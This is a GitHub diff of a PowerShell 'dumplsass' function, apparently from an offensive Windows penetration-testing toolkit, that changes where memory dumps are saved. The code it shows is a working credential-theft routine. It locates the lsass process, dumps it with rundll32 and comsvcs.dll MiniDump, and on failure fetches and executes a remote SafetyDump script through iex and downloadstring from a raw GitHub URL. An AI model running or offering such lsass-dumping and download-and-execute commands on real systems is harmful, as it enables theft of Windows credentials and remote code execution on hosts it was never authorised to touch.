File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -503,13 +503,14 @@ function dumplsass
503503 $dumpid = foreach ($process in $processes ){if ($process.ProcessName -eq " lsass" $process.id }}
504504 Write-Host " Found lsass process with ID $dumpid - starting dump with rundll32"
505505 Write-Host " Dumpfile goes to .\Exploitation\$env: computername .dmp "
506- rundll32 C:\Windows\System32\comsvcs.dll, MiniDump $dumpid $currentPath \$env: computername.dmp full
506+ rundll32 C:\Windows\System32\comsvcs.dll, MiniDump $dumpid $currentPath \Exploitation\ $env: computername.dmp full
507507 }
508508 catch {
509509 Write-Host " Something went wrong, using safetykatz instead"
510510 iex (new-object net.webclient).downloadstring(' https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/SafetyDump.ps1'
511- Write-Host - ForegroundColor Yellow ' Dumping lsass to C:\windows\temp \debug.bin :'
511+ Write-Host - ForegroundColor Yellow ' Dumping lsass to .\Exploitation \debug.bin :'
512512 Safetydump
513+ move C:\windows\temp\debug.bin $currentPath \Exploitation\debug.bin
513514 }
514515 }
515516 else {Write-Host " No Admin rights, start again using a privileged session!"
You can’t perform that action at this time.
0 commit comments